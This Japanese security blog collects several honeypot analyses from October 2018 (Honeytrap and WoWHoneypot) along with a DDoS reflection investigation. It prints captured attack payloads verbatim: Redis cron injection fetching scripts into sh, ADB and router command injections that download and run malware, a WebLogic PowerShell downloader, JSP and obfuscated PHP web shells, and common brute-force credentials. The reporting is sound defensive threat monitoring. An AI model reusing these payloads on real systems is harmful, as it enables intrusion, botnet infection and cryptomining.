sec-chick Blog

サイバーセキュリティブログ

【ハニーポット】Honeytrap簡易分析(81-83日目:10/28-10/30)

Honeytrapの簡易分析となります。

特に目立った通信はなく、いつも通りの通信内容でした。

f:id:one-chick-sec:20181031003404p:plain

f:id:one-chick-sec:20181031054341p:plain

<宛先ポート別>
宛先ポート
検知数
445 5926
22 175
1433 164
5555 133
8080 133
3389 126
81 122
1962 64
4567 62
6379 56

ポート1962および4579は調査行為相当の通信で変わったものはありませんでした。
また、ポート6379はCoinMinerのダウンロードを狙った通信を検知していました。

sec-chick.hatenablog.com



マルウェアダウンロード先>
宛先ポート マルウェアダウンロード 検知数
52869 hxxp://109[.]201[.]143[.]178/loli[.]mips 43
5555 hxxp://209[.]97[.]163[.]186/bc 24
5555 hxxp://80[.]211[.]117[.]113/bc 12
5555 hxxp://188[.]209[.]52[.]142/c 11
5555 hxxp://185[.]162[.]130[.]187/adbs2 6
52869 hxxp://185[.]159[.]82[.]181/h[.]hua 2
5555 hxxp://27[.]102[.]115[.]44/adbs2 1
5555 hxxp://95[.]215[.]62[.]169/adbs 1
マルウェアの傾向は特に変化ありませんでした。
 
以上となります。

【ハニーポット】Honeytrap簡易分析(78-80日目:10/25-10/27)

 Honeytrapの簡易分析となります。

◾️10/25-10/27 Honeytrap分析(80ポートを除く)

f:id:one-chick-sec:20181028162233p:plain

f:id:one-chick-sec:20181028162252p:plain

 <宛先ポート通信>

宛先ポート 検知数
445 7631
9922 260
3389 223
1433 221
22 187
81 179
8080 140
5555 103
52869 90
6379 84

 


<宛先ポート 9922の通信>
9922ポート宛の通信が増加していますが、中身はSSHへのアクセスを狙った調査行為の通信
ペイロード
SSH-2.0-libssh2_1.4.3..

<宛先ポート 6379の通信>
検知数は多いものの、気になったので調査しました。Redisサーバを狙った脆弱性と思われます。最終的にはCoinMinerのダウンロードを試みていますが、ダウンロード用のスクリプトで様々なサービスをkillしたりしていました。

ペイロード
set backuper1 "\n\n\n*/1 * * * * root (curl -fsSL hxxps://pastebin.com/raw/xbY7p5Tb||wget -q -O- hxxps://pastebin.com/raw/xbY7p5Tb)|sh\n\n\n"..set backuper2 "\n\n\n*/1 * * * * (curl -fsSL hxxps://pastebin.com/raw/xbY7p5Tb||wget -q -O- hxxps://pastebin.com/raw/xbY7p5Tb)|sh\n\n\n"..config set dir /etc/cron.d/..config set dbfilename root..save..config set dir /var/spool/cron/..config set dbfilename root..save..config set dir /var/spool/cron/crontabs/..config set dbfilename root..save..

→hxxps://pastebin[.]com/raw/uuYVPLXd で取得した文字列をBase64でデコード
→CoinMinerのダウンロード

 

マルウェアの傾向は大きく変化していませんでした。

宛先ポート ダウンロード先 ペイロード 脆弱性 検知数
52869 hxxp://185[.]159[.]82[.]181/h[.]hua
hxxp://76[.]74[.]177[.]230/seraph[.]mips
hxxp://109[.]201[.]143[.]178/loli[.]mips
POST /picsdesc.xml HTTP/1.1
~省略~
<NewInternalClient>`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/h.hua -O h`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>
~省略~
  63
5555 hxxp://185[.]162[.]130[.]187/adbs2
hxxp://80[.]211[.]117[.]113/bc
hxxp://188[.]209[.]52[.]142/c
CNXN............2.......host::.OPEN9............C......shell:cd /data/local/tmp;wget hxxp://xxx.xxx.xxx.xxx/br -O- >br;sh br;busybox wget hxxp://xxx.xxx.xxx.xxx/r -O- >r;sh r;curl hxxp://xxx.xxx.xxx.xxx/c >c;sh c;busybox curl hxxp://xxx.xxx.xxx.xxx/bc >bc;sh bc;rm -rf bc br r c;echo lol.   72
8081 hxxp://206[.]189[.]196[.]216/dlink POST /HNAP1/ HTTP/1.0
SOAPAction: hxxp://purenetworks.com/HNAP1/`wget hxxp://xxx.xxx.xxx.xxx/dlink -O -> /tmp/.repn && chmod 777 /tmp/.repn && sh /tmp/.repn`
~省略~
D-Link 1

 

以上となります。

【ハニーポット事件簿】ハニーポットがDDoS攻撃を受けたので調査してみた

今回、自分の植えているハニーポットDDoS攻撃を受けたので、DDoS攻撃について色々と調べてみました。

目次 

 

1.DoS攻撃通知メール

仕事をしていると、自分のメール宛に以下のようなメールが送信されて来ました。

----------------------------
【重要】DoSアタック発生による通信遮断処理のご報告 

平素は弊社サービスをご利用いただき、誠にありがとうございます。
お客様ご利用のIPアドレスに対して、外部からDoSアタックを受けている状態 を検知いたしました。

この影響により、他のお客様のサービスが正常にご利用できない状態となる恐れ がございましたため、上記のIPアドレス通信を遮断いたしました。
DoSアタック検知時刻 :2018年10月21日 10時17分09秒
通信遮断時刻 :2018年10月21日 10時17分15秒

現在は  お客様のIP に対しての通信の疎通性が取れない状態となっております。
通信遮断処理の解除につきましては、弊社にてDoSアタックの収束を確認後に実施いたします。設定の解除後に再度メールにてご報告差し上げます。 緊急の措置でございましたため、事後のご報告となりましたこと深くお詫び申し上げます。

---------------------------- 
自分のハニポが攻撃を受けている?と疑問に思ったため、今回調査してみようと思いました。ちなみに自分が植えているVPS上では特に阻害の連絡はありませんでした。

 

2 攻撃情報

メールにどのような攻撃が来ているか記載されていたので、纏めてみました。

 <送信元IP別の検知トラフィック量>
上位から100件のIPがメールに記載されていましたが、今回は抜粋して10件としています。特徴としては1つのIPからではなく、複数の送信元IPから攻撃を受けていましたので、DDoSで攻撃されていました。
また、検知したIPごとの通信量はおおよそ20mbpsでした。

srcip mbps pps asn cc
198.12.153.xxx 21.3 2457 26496 US
5.167.52.xxx 19.9 1638 57378 RU
37.235.150.xxx 19.9 1638 41268 RU
46.149.84.xxx 19.9 1638 34814 UA
58.211.34.xxx 19.9 1638 4134 CN
59.46.168.xxx 19.9 1638 134762 CN
60.14.36.xxx 19.9 1638 4837 CN
61.33.138.xxx 19.9 1638 3786 KR
61.164.6.xxx 19.9 1638 4134 CN
62.96.249.xxx 19.9 1638 8220 GB


 <宛先ポート別の検知トラフィック量>
452ポートから27005ポートのレンジからの通信がメールには記載されていました。今回、メールで記載されていたのでは、上位100件であったので他のハイポート宛の通信も検知していると思われます。

proto dstport length mbps pps
udp 0 >1500 3789.2 312115
udp 452 >1500 9.9 819
udp 857 >1500 9.9 819
udp 952 >1500 9.9 819
udp 1603 >1500 159.1 13107
udp 1778 >1500 9.9 819
udp 1885 >1500 9.9 819
udp 2010 >1500 9.9 819
udp 2044 >1500 9.9 819
udp 2052 >1500 9.9 819


 <送信元ポート別の検知トラフィック量>
送信元ポートはウェルノウンポートが多いのが特徴でした。

proto srcport length mbps pps
udp 0 >1500 3789.2 312115
udp 53 >1500 2367.1 194969
udp 389 >1500 3272.1 269516
udp 0 1000~1499 2822.9 277708
udp 53 1000~1499 719.6 60620
udp 389 1000~1499 238.5 21299
udp 0 500~999 1437.4 187596
udp 53 500~999 4.7 819
udp 0 200~499 26.6 11468
udp 53 200~499 5.4 1638
icmp 3 100~199 2.3 2457
udp 0 100~199 28.4 24576
udp 0 ~99 32.7 57344


3 分析


結論から言うとおそらくUDPコネクションレス性質を利用したリフレクション攻撃だと推測されます。有名な攻撃手法は、DNSリフレクション攻撃やNTPリフレクション攻撃があります。

特定のポートを狙ったDDoS攻撃であれば、宛先ポート別の検知トラフィック量は特定のポートに集中するはずですが、今回の検知ではポート番号はバラバラでした。逆に、送信元ポート別の検知トラフィック量ではウェルノーンポート宛が多い特徴がありました。この通信フローを信じるのであれば、自分のハニーポットから複数宛先IPに対して、様々なウェルノーンポート宛へ通信しそのレスポンスのトラフィック量が多いため、DDoS攻撃と判断されたということになります。
<自分のハニーポットから攻撃した場合の通信フロー>

f:id:one-chick-sec:20181025190500p:plain

・自分から大量のリクエストを送信している場合、この通信についても業者から注意喚起が来ると思うが、特に通知なし
ハニーポットのサーバ内を確認したが、不審なファイルやコマンド入力などはなし
・攻撃を仕掛けるなら、特定のサーバに対して実行すると想定されるが、わざわざハニーポットを攻撃するために外部サーバにリクエストを送るのは非効率
※何かしらでハニーポットに侵入できているのであれば、いくらでも悪用可能
UDPによるリフレクション攻撃と判断


UDPによるリフレクションを想定した場合、以下の通信がフローになります。
f:id:one-chick-sec:20181025191547p:plain
この通信フローの場合、ハニーポットに届く通信は以下となります。

・送信元IP:外部サーバ群
・宛先IP:ハニーポット
・宛先ポート:ハイポート
・送信元ポートがウェルノーンポート

上記の通信であれば、業者から届いたメールとも辻褄が合います。
次にメールに記載されていた送信元IPについて調べてみました。UDPによるリフレクション攻撃であれば、送信元サーバがUDPのリクエストを受付可能であると推測されます。今回は検索サイト「shodan」 を利用して検索しました。

Shodan

Shodanとはインターネットに接続している様々なコンピュータを検索対象としており、どのポートが解放されていて、どのような脆弱性が存在するかなどの情報を確認できるサイトとなっています。メールに記載されていた外部サーバの50種類のIPについて調査してみました。
<解放されていたポート(上位件数を抜粋)>

解放ポート 件数 解放ポート 件数 解放ポート 件数
53 48 445 9 993 3
80 27 22 9 8008 3
2000 25 161 6 515 3
1723 17 23 6 636 3
389 14 25 5 179 3
443 14 8080 5 587 2
88 14 81 5 995 2
123 12 110 4 3389 2
5985  11 143 4 3306 2
21 11 2222 4 8010 1


本来であれば外部からアクセスさせてはいけないポートが多数空いていました。DNSのポート 53については調査したほとんどのサーバでポートが解放されており、その内45個のサーバで再帰的な問い合わせが可能な状態でした。
再帰的な問い合わせが可能なDNSサーバは、オープンリゾルバと呼ばれており、DNSリフレクション攻撃で利用されてしまいます。
また、脆弱性が存在しているサーバも複数存在しており、踏み台として使われてしまう可能性は高いと思います。

 

4 まとめ

今回、発生してDDoS攻撃について、調査しました。なぜ、自分のIPが被害にあったかまでは特定することは出来なかったものの、踏み台とされるようなサーバがインターネット上に多数存在することが今回の調査でわかりました。
もし、このプログを読まれた方で放置しているサーバがあれば、一度踏み台にされないか確かめてみてください。
今回の攻撃は攻撃者のIPが分からないため、そのIPからの通信の遮断や通報も出来ないので止める手段がないのが悩ましい問題です。

現在は攻撃の止まったとのことで通信規制は解除されたので、今まで通りの運用が出来ています。

以上、今回の調査事件簿となります。

 

【ハニーポット】Honeytrap簡易分析(73-77日目:10/20-10/24)

Honeytrapの73-77日目の簡易分析となります。
10/22(月)にDoS攻撃を受けましたが、TCPのみしか取得していなかったため攻撃の詳細までは取得できていませんでした。わかる範囲で別途、ブログに纏めたいと思います。

f:id:one-chick-sec:20181025130058p:plain

 

f:id:one-chick-sec:20181025135958p:plain

<宛先ポート>

宛先ポート
検知数
445 7968
22 399
3389 299
7001 224
8822 220
7002 203
9001 184
2222 170
8022 156
222 154
 
Weblogicで利用されているポート 7001の通信が増加していました。気になったので、7001ポート宛の通信を以下に纏めてみました。 

ペイロード 検知数
GET /bea_wls_deployment_internal HTTP/1.1 215
GET / HTTP/1.1 1
GET / HTTP/1.1..Host: xxx.xxx.xxx.xxx:7001
User-Agent: HTTP Banner Detection(security.ipip.net)
1
GET /invoker/readonly 1
GET /verifylogin.do HTTP/1.1
Content-Type: %{(#test='multipart/form-data')
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)
(#_memberAccess?(#_memberAccess=#dm)
:*1.
(#ognlUtil.getExcludedPackageNames().clear()).
(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).
(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).
(#ros.println(55*55+1)).(#ros.flush())}
1
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
<soapenv:Envelope xmlns:soapenv="hxxp://schemas.xmlsoap.org/soap/envelope/">   
~省略~
<void index="0">..     <string>cmd</string>..     </void>..     <void index="1">..     <string>/c</string>..     </void>..     <void index="2">..     <string>powershell (new-object System.Net.WebClient).DownloadFile('hxxp://a46.bulehero.in/download.exe','C:/14.exe');start C:/14.exe</string>
~省略~
3
PUT /indexweb4.jsp/ HTTP/1.1.<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!public static String excuteCmd(String c)
{StringBuilder line = new StringBuilder();
try {. Process pro = Runtime.getRuntime().exec(c);
BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
String temp = null;..    while *2 != null)
{ line.append(temp+"\\n");..}.
 buf.close();..} ..catch (Exception e)
{..    line.append(e.getMessage());..}..return line.toString();..}..%>
<%..if("bala123".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd")))
{.out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");..}..else..{..    out.println(":-)");..}..%>
1
t3 12.2.1.AS:255.HL:19.MS:10000000.PU:t3://us-l-breens:7001.. 1

ダントツで多かった通信内容は「GET /bea_wls_deployment_internal HTTP/1.1」でした。10月にOracleのパッチアップデートがあったので、その脆弱性を利用するための調査行為かもしれません。
t3プロトコルの通信も来ていましたが、途中で切れてしまっているため、通信内容の詳細は不明です。他の脆弱性を狙ったものはありましたが、特に新しい脆弱性を狙ったものはありませんでした。

<マルウェアダウンロード>

宛先ポート  
52869 hxxp://76[.]74[.]177[.]230/seraph[.]mips
52869 hxxp://107[.]191[.]99[.]230/loli[.]mips
52869 hxxp://76[.]74[.]177[.]230/hakai[.]mips
5555 hxxp://80[.]211[.]117[.]113/bc
5555 hxxp://188[.]209[.]52[.]142/c
5555 hxxp://185[.]162[.]130[.]187/adbs2
5555 hxxp://27[.]102[.]115[.]44/adbs2
8081 hxxp://185[.]244[.]25[.]131/Botnet[.]mips
52869 hxxp://89[.]248[.]171[.]57/gpon


◾️8081ポートのマルウェアダウンロード
D-Linkルータの脆弱性(CVE-2015-2051)を狙った攻撃であり、Mirai系のマルウェアでした。

POST /HNAP1/ HTTP/1.0
SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://xxx.xxx.xxx.xxx/Botnet.mips &&


以上となります。

*1:#container=#context['com.opensymphony.xwork2.ActionContext.container'])
.(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class

*2:temp = buf.readLine(

【ハニーポット】WoWHoneypot簡易分析(9/14-9/20)

現在、HoneytrapとHoneypotの両方を監視しているのですが、WoWHoneypotについてあまり纏めていなかったので、週次で記事を書いていこうと思います。

◾️WoWHoneypot
<検知傾向>

f:id:one-chick-sec:20181022140449p:plain
<検知数>

f:id:one-chick-sec:20181022140522p:plain

10/15の検知が非常に多く、検知内容の大半がTomcat Managerへのアクセスでした。
Basic認証を突破しようとする総当たり攻撃でしたが、ユーザー名とパスワードはよく利用されそうなものでした。
例:
123:1q2w3e4r
123:P@$$w0rd1234
123456:1qazXSW@
admin:123
admin:Pa$$w0rd@0
manager:P@$$w0rd1
role1:P@$$w0rd@123456
tomcat:nimda


<マルウェアダウンロード>
AVTECH IP Camera の脆弱性を狙った攻撃を検知していました。他のハニーポッターの方でも検知していたとの報告が多数上がっています。

ダウンロード先 ペイロード 検知数
hxxp://209[.]141[.]40[.]213/dlink GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://xxx.xxx.xxx.xxx/dlink%20-O%20-%3E%20/tmp/gexoe;sh%20/tmp/gexoe%27$ HTTP/1.1.Connection: keep-alive.Accept-Encoding: gzip, deflate.Accept: */*.User-Agent: Sefa.. 12
hxxp://209[.]141[.]40[.]213/avtech GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20hxxp://xxx.xxx.xxx.xxx/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1.User-Agent: Sefa.Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8.Accept-Language: en-GB,en;q=0.5.Accept-Encoding: gzip, deflate.Connection: close.. 13



<検知状況>
圧倒的にTomcat Managerへのアクセスが多かったです。

メソッド パス 検知数
GET /manager/html 4775
GET / 226
GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget hxxp://xxx.xxx.xxx.xxx/avtech -O niXd; chmod 777 niXd; sh niXd)&password=admin 12
POST /wls-wsat/CoordinatorPortType 9
GET hxxp://xxx.xxx.xxx.xxx/testget?q=23333&port=80 5
GET /admin/assets/js/views/login.js 4
GET /wls-wsat/CoordinatorPortType 4
HEAD / 4
GET /HNAP1/ 3
POST /GponForm/diag_Form?images/ 3
GET //MyAdmin/scripts/setup.php 2
GET //myadmin/scripts/setup.php 2
GET //phpMyAdmin/scripts/setup.php 2
GET //phpmyadmin/scripts/setup.php 2
GET //pma/scripts/setup.php 2
GET /admin/phpMyAdmin/index.php 2
GET /claroline/phpMyAdmin/index.php 2
GET /index/article/lists/cid/3 2
GET /login.cgi?cli=aa aa';wget hxxp://xxx.xxx.xxx.xxx/dlink -O -> /tmp/gexoe;sh /tmp/gexoe'$ 2
GET /muieblackcat 2
GET /phpMyAdmin/phpMyAdmin/index.php 2
GET /phpmyadmin/ 2
GET /tools/phpMyAdmin/index.php 2
GET /web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr 2
GET /web/phpMyAdmin/index.php 2
GET /www/phpMyAdmin/index.php 2
PROPFIND / 2
CONNECT cn.bing.com:443 1
CONNECT www.baidu.com:443 1
GET /.bitcoin/wallet.dat 1
GET /.well-known/security.txt 1
GET //php/phpmyadmin/scripts/setup.php 1
GET //phpMyAdmin-2.6.9/scripts/setup.php 1
GET //phpMyAdmin-xxx.xxx.xxx.xxx/scripts/setup.php 1
GET /?XDEBUG_SESSION_START=phpstorm 1
GET /?a=<foo> 1
GET /PMA/index.php 1
GET /PMA2/index.php 1
GET /admin/PMA/index.php 1
GET /admin/index.php 1
GET /admin/mysql/index.php 1
GET /admin/mysql2/index.php 1
GET /admin/phpmyadmin/index.php 1
GET /admin/phpmyadmin2/index.php 1
GET /admin/pma/index.php 1
GET /ccvv 1
GET /cmx.php?cmd=echo "<?php \$func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';\$test=\$func('\$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e(\$x));');\$test('QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpeyhzdWJzdHIoc2hhMShtZDUoQCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpJiYkX1NFU1NJT05bJ3RoZUNvZGUnXT10cmltKCRfUE9TVFsnY29kZSddKTt9aWYoaXNzZXQoJF9TRVNTSU9OWyd0aGVDb2RlJ10pKXtAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7fQ=='); ?>" >images.php & echo Hello, Peppa! 1
GET /cmx.php?cmd=echo ^<?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');$test('QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpeyhzdWJzdHIoc2hhMShtZDUoQCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpJiYkX1NFU1NJT05bJ3RoZUNvZGUnXT10cmltKCRfUE9TVFsnY29kZSddKTt9aWYoaXNzZXQoJF9TRVNTSU9OWyd0aGVDb2RlJ10pKXtAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7fQ=='); ?^> >images.php & echo Hello, Peppa! 1
GET /console 1
GET /db/index.php 1
GET /dbadmin/index.php 1
GET /favicon.ico 1
GET /index.php 1
GET /login.cgi?cli=aa aa';wget hxxp://xxx.xxx.xxx.xxx/t.php'$ 1
GET /myadmin/index.php 1
GET /myadmin2/index.php 1
GET /mysql-admin/index.php 1
GET /mysql/index.php 1
GET /mysqladmin/index.php 1
GET /phpAdmin/index.php 1
GET /phpMyAbmin/index.php 1
GET /phpMyAdm1n/index.php 1
GET /phpMyAdmin   ---/index.php 1
GET /phpMyAdmin-4.4.0/index.php 1
GET /phpMyAdmin.old/index.php 1
GET /phpMyAdmin/index.php 1
GET /phpMyAdmin__/index.php 1
GET /phpMyAdminold/index.php 1
GET /phpMyAdmion/index.php 1
GET /phpMyadmi/index.php 1
GET /phpMyadmin_bak/index.php 1
GET /phpadmin/index.php 1
GET /phpma/index.php 1
GET /phpmyadm1n/index.php 1
GET /phpmyadmin 1
GET /phpmyadmin-old/index.php 1
GET /phpmyadmin/index.php 1
GET /phpmyadmin/phpmyadmin/index.php 1
GET /phpmyadmin0/index.php 1
GET /phpmyadmin1/index.php 1
GET /phpmyadmin2/index.php 1
GET /pma-old/index.php 1
GET /pma/index.php 1
GET /pmamy/index.php 1
GET /pmamy2/index.php 1
GET /pmd/index.php 1
GET /robots.txt 1
GET /shaAdmin/index.php 1
GET /sitemap.xml 1
GET /typo3/phpmyadmin/index.php 1
GET /upload/bank-icons/bank-gh.jpg 1
GET /upload/bank-icons/bank_16.png 1
GET /v/index.php 1
GET /wallet.dat 1
GET /wallets/wallet.dat 1
GET /webadmin/tpl/style.admin.css 1
GET /webdav/ 1
GET /xampp/phpmyadmin/index.php 1
GET /yealink/y000000000000.cfg 1
GET hxxp://api.ipify.org/ 1
GET hxxp://www.123cha.com/ 1
GET hxxp://www.ip.cn/ 1
GET hxxp://xxx.xxx.xxx.xxx/echo.php 1
GET hxxp://xxx.xxx.xxx.xxx:10083/index.php 1
HEAD /newhome/img/logo.png 1
HEAD /static/upload/20180921/th_317a3298794099e0bab477e4f3d732a4.png 1
OPTIONS /ipc$ 1
POST / 1
POST /cmx.php 1
POST /images.php 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153944726797&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153949072501&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153978850135&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153981707711&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153984761625&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153992111173&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153994958159&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153999669485&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=154007072173&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=154012893921&a=PSCN&i=2685440439&p=80 1




以上、簡易分析となります。

【ハニーポット】Honeytrap簡易分析(65-72日目:10/17-10/19)

まとめての分析結果となりますが、Honeytrapの65-72日目の簡易分析です。

 

◾️Honeytrap 簡易分析
特段、大きく傾向の変わった通信はありませんでした。

<攻撃元検知分布>

f:id:one-chick-sec:20181023094816p:plain


<検知数>

f:id:one-chick-sec:20181023094829p:plain

<検知宛先ポート>
443ポート宛ての通信が多いですが、何かの脆弱性を狙ったものではなく、調査行為止まりの通信だと思います。
◾️ペイロード
SMBrS@bPC NETWORK PROGRAM 10LANMAN10Windows for Workgroups 31aLM12X002LANMAN21NT LM 012

宛先ポート 検知数
445 9184
22 302
8022 251
2222 247
222 241
3389 208
1433 199
81 160
8080 155
443 151


<マルウェアダウンロード先>
特に検知傾向は変化せず、Mirai系のマルウェアが多く見られました。

宛先ポート ダウンロード先 ペイロード 検知数
5555 hxxp://185[.]162[.]130[.]187/adbs2 CNXN............2.......host::.OPEN............aJ......shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/adbs -O -> adbs; sh adbs; curl hxxp://xxx.xxx.xxx.xxx/adbs2 > adbs2; sh adbs2; rm adbs adbs2. 5
5555 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. 4
5555 hxxp://188[.]209[.]52[.]142/c CNXN............2.......host::.OPEN.............@......shell:busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> /data/local/tmp/w; sh /data/local/tmp/w; rm /data/local/tmp/w; curl hxxp://xxx.xxx.xxx.xxx/c > /data/local/tmp/c; sh /data/local/tmp/c; rm /data/local/tmp/c........... 33
5555 hxxp://207[.]148[.]78[.]152/bc CNXN............2.......host::.OPEN............&A......shell:cd /data/local/tmp;wget hxxp://xxx.xxx.xxx.xxx/br -O- >br;sh br;busybox wget hxxp://xxx.xxx.xxx.xxx/r -O- >r;sh r;curl hxxp://xxx.xxx.xxx.xxx/c >c;sh c;busybox curl hxxp://xxx.xxx.xxx.xxx/bc >bc;sh bc;rm -rf bc br r c;. 1
5555 hxxp://27[.]102[.]115[.]44/adbs2 CNXN............2.......host::.OPEN)...........O/......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/adbs -O -> adbs; sh adbs; curl hxxp://xxx.xxx.xxx.xxx/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2. 1
52869 hxxp://107[.]191[.]99[.]230/loli[.]mips POST /picsdesc.xmlhxxp/1.1..Host: xxx.xxx.xxx.xxx:52869..Content-Length: 633..Accept-Encoding: gzip, deflate..SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping..Accept: */*..User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.2.1.el6.x86_64..Connection: keep-alive....<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/loli.mips -O loli`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> 45
52869 hxxp://76[.]74[.]177[.]230/hakai[.]mips POST /picsdesc.xmlhxxp/1.1..Host: xxx.xxx.xxx.xxx:52869..Content-Length: 634..Accept-Encoding: gzip, deflate..SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping..Accept: */*..User-Agent: python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-693.el7.x86_64..Connection: keep-alive....<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/hakai.mips -O hakai`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> 31
52869 hxxp://76[.]74[.]177[.]230/seraph[.]mips POST /picsdesc.xmlhxxp/1.1..Host: xxx.xxx.xxx.xxx:52869..Content-Length: 636..Accept-Encoding: gzip, deflate..SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping..Accept: */*..User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.23.1.el6.x86_64..Connection: keep-alive....<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/seraph.mips -O seraph`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> 21




ハニーポット簡易分析(64-70日目:10/14-10/17)

更新が遅れてしまいましたが、今週中に先週分の分析結果を順次アップしていこうと思います。 

ハニーポット簡易分析(64-70日目:10/14-10/17)
<Honeytrap分析結果>
※80ポート宛の通信は除外しています。

f:id:one-chick-sec:20181021234930p:plain

f:id:one-chick-sec:20181021234947p:plain
10/16での検知数増加は2つのIPによるスキャン行為でした。主に30000番台のポートをスキャンしており、外部でも不審なIPとして報告されていました。

送信元IP 検知数 概要
185[.]222[.]209[.]38 7,517 ポート 30000番台へのスキャン
62[.]76[.]75[.]210 3,631 ポート 30000番台へのスキャン

185.222.209.38 | Cloud Core LP | AbuseIPDB

62.76.75.210 | OOO Serverland | AbuseIPDB



<宛先ポート別通信>

宛先ポート

検知数
445 12030
3389 336
22 279
1433 261
8080 231
81 209
8545 194
2222 169
8022 156
222 152


<ポート 8022宛通信>
